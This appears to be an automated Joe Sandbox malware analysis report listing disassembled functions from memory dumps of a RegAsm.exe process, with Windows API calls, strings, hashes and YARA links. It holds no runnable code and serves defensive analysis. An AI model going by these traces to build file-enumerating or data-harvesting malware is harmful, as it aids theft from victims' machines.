API String ID: 2974738957-0
Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8

Function 004184AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D

Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A

Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94

Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8

Function 00412541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 00412577

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction ID: ef242af97a818274634bdf18eaf41cd9f3ea813bb85b2b5ad444d7661f99d088
Opcode Fuzzy Hash: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction Fuzzy Hash: CAE09AB0D0420E9FDF44EFE4D5152DDBAF8BF08308F40916AC115F3240E37442058BA9

Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407EB5

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

Non-executed Functions

Function 6C026C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C026CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C026D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C026D26

Part of subcall function 6C02CA10: malloc.MOZGLUE(?), ref: 6C02CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C026D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C026D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C026D73
free.MOZGLUE(00000000), ref: 6C026D80
CertGetNameStringW.CRYPT32 ref: 6C026DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C026DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C026DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C026DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C026E10
CryptMsgClose.CRYPT32(00000000), ref: 6C026E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C026E34
CreateFileW.KERNEL32 ref: 6C026EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C026F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C026F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C02709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C027103
free.MOZGLUE(00000000), ref: 6C027153
CloseHandle.KERNEL32(?), ref: 6C027176
__Init_thread_footer.LIBCMT ref: 6C027209
__Init_thread_footer.LIBCMT ref: 6C02723A
__Init_thread_footer.LIBCMT ref: 6C02726B
__Init_thread_footer.LIBCMT ref: 6C02729C
__Init_thread_footer.LIBCMT ref: 6C0272DC
__Init_thread_footer.LIBCMT ref: 6C02730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C0273C2
VerSetConditionMask.NTDLL ref: 6C0273F3
VerSetConditionMask.NTDLL ref: 6C0273FF
VerSetConditionMask.NTDLL ref: 6C027406
VerSetConditionMask.NTDLL ref: 6C02740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C02741A
moz_xmalloc.MOZGLUE(?), ref: 6C02755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C027568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C027585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C027598
free.MOZGLUE(00000000), ref: 6C0275AC

Part of subcall function 6C04AB89: EnterCriticalSection.KERNEL32(6C09E370,?,?,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284), ref: 6C04AB94
Part of subcall function 6C04AB89: LeaveCriticalSection.KERNEL32(6C09E370,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C04ABD1

Strings

SHA256, xrefs: 6C026EC0
(, xrefs: 6C02768A
CryptCATAdminReleaseCatalogContext, xrefs: 6C0272C8
wintrust.dll, xrefs: 6C0272CD

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 56bf9ffca505f99c24bfe1b247bf7ce8a9e1ad53ebaf66f324e646e2e38480c8
Instruction ID: ae795f1b5e4b6d899eb216cfc3aa3e8bf04f81b20f6a618d60319b0dbc588a1f
Opcode Fuzzy Hash: 56bf9ffca505f99c24bfe1b247bf7ce8a9e1ad53ebaf66f324e646e2e38480c8
Instruction Fuzzy Hash: 3252A2B1A012149BEB219F68CC84BAB77FCFF45718F1051A9E909A7640DB74AF84CF91

Function 6C05F070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C05F09B

Part of subcall function 6C035B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0356EE,?,00000001), ref: 6C035B85
Part of subcall function 6C035B50: EnterCriticalSection.KERNEL32(6C09F688,?,?,?,6C0356EE,?,00000001), ref: 6C035B90
Part of subcall function 6C035B50: LeaveCriticalSection.KERNEL32(6C09F688,?,?,?,6C0356EE,?,00000001), ref: 6C035BD8
Part of subcall function 6C035B50: GetTickCount64.KERNEL32 ref: 6C035BE4

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C05F0AC

Part of subcall function 6C035C50: GetTickCount64.KERNEL32 ref: 6C035D40
Part of subcall function 6C035C50: EnterCriticalSection.KERNEL32(6C09F688), ref: 6C035D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C05F0BE

Part of subcall function 6C035C50: __aulldiv.LIBCMT ref: 6C035DB4
Part of subcall function 6C035C50: LeaveCriticalSection.KERNEL32(6C09F688), ref: 6C035DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C05F155
GetCurrentThreadId.KERNEL32 ref: 6C05F1E0
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F1ED
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F212
GetCurrentThreadId.KERNEL32 ref: 6C05F229
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C05F231
?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C05F248
GetCurrentThreadId.KERNEL32 ref: 6C05F2AE
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F2BB
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F2F8

Part of subcall function 6C04CBE8: GetCurrentProcess.KERNEL32(?,6C0131A7), ref: 6C04CBF1
Part of subcall function 6C04CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0131A7), ref: 6C04CBFA

Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C024A68), ref: 6C05945E
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C059470
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C059482
Part of subcall function 6C059420: __Init_thread_footer.LIBCMT ref: 6C05949F

GetCurrentThreadId.KERNEL32 ref: 6C05F350
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F35D
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F381
GetCurrentThreadId.KERNEL32 ref: 6C05F398
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C05F3A0
GetCurrentThreadId.KERNEL32 ref: 6C05F489
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C05F491

Part of subcall function 6C0594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0594EE
Part of subcall function 6C0594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C059508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C05F3CF

Part of subcall function 6C05F070: GetCurrentThreadId.KERNEL32 ref: 6C05F440
Part of subcall function 6C05F070: AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F44D
Part of subcall function 6C05F070: ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F472

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C05F4A8
GetCurrentThreadId.KERNEL32 ref: 6C05F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C05F561
GetCurrentThreadId.KERNEL32 ref: 6C05F577
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F585
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F5A3

Strings

[I %d/%d] profiler_pause_sampling, xrefs: 6C05F3A8
[I %d/%d] profiler_resume_sampling, xrefs: 6C05F499
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C05F56A
[I %d/%d] profiler_resume, xrefs: 6C05F239

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 565197838-2840072211
Opcode ID: 1a36f7f2f5b16dc8c798a77ac9d6f7731876bcb229f41853b15c3802c1d9ce5f
Instruction ID: 29c17a8c2e15fa6c3baa9e2f252cea0eab69d7ed11d0dc13960d10590fc63841
Opcode Fuzzy Hash: 1a36f7f2f5b16dc8c798a77ac9d6f7731876bcb229f41853b15c3802c1d9ce5f
Instruction Fuzzy Hash: 88D12575604300DFDB109F68C4047AA77FDFB8A328F54562AF95983B80DF74A818CBA6

Function 6C0264C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C0264DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C0264F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C026505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C026518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C02652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C02671C
GetCurrentProcess.KERNEL32 ref: 6C026724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C02672F
GetCurrentProcess.KERNEL32 ref: 6C026759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C026764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C026A80
GetSystemInfo.KERNEL32(?), ref: 6C026ABE
__Init_thread_footer.LIBCMT ref: 6C026AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C026AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C026AF7

Strings

nvd3d9wrap.dll, xrefs: 6C026500
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C026798
detoured.dll, xrefs: 6C0264DA
_etoured.dll, xrefs: 6C0264ED
user32.dll, xrefs: 6C026526
nvdxgiwrap.dll, xrefs: 6C026513

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 0d3c1694735712059d617f3a812e2a9a31d24a9a9fc4f031edb45f89653c4596
Instruction ID: 8ac1fd90808b86b75b7f3f258c57a1097a397b0811deebe18421a97288d6dc1d
Opcode Fuzzy Hash: 0d3c1694735712059d617f3a812e2a9a31d24a9a9fc4f031edb45f89653c4596
Instruction Fuzzy Hash: 53F1C4709052299FDB20CF64CD88B9AB7F9BF46318F1442E9D819E7641DB35AE84CF90

Function 00415B0B Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 179stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
HeapAlloc.KERNEL32(00000000), ref: 00415B37
wsprintfA.USER32 ref: 00415B50
FindFirstFileA.KERNEL32(?,?), ref: 00415B67
StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
wsprintfA.USER32 ref: 00415BC9

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 0041580D: _memset.LIBCMT ref: 00415845
Part of subcall function 0041580D: _memset.LIBCMT ref: 00415856
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6
Part of subcall function 0041580D: StrStrA.SHLWAPI(00000000), ref: 0041596A

FindNextFileA.KERNEL32(?,?), ref: 00415CD8
FindClose.KERNEL32(?), ref: 00415CEC
lstrcatA.KERNEL32(?), ref: 00415D1A
lstrcatA.KERNEL32(?), ref: 00415D2D
lstrlenA.KERNEL32(?), ref: 00415D39
lstrlenA.KERNEL32(?), ref: 00415D56

Strings

%s\%s, xrefs: 00415BC3
%s\*, xrefs: 00415B4A
K_A, xrefs: 00415DE8

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
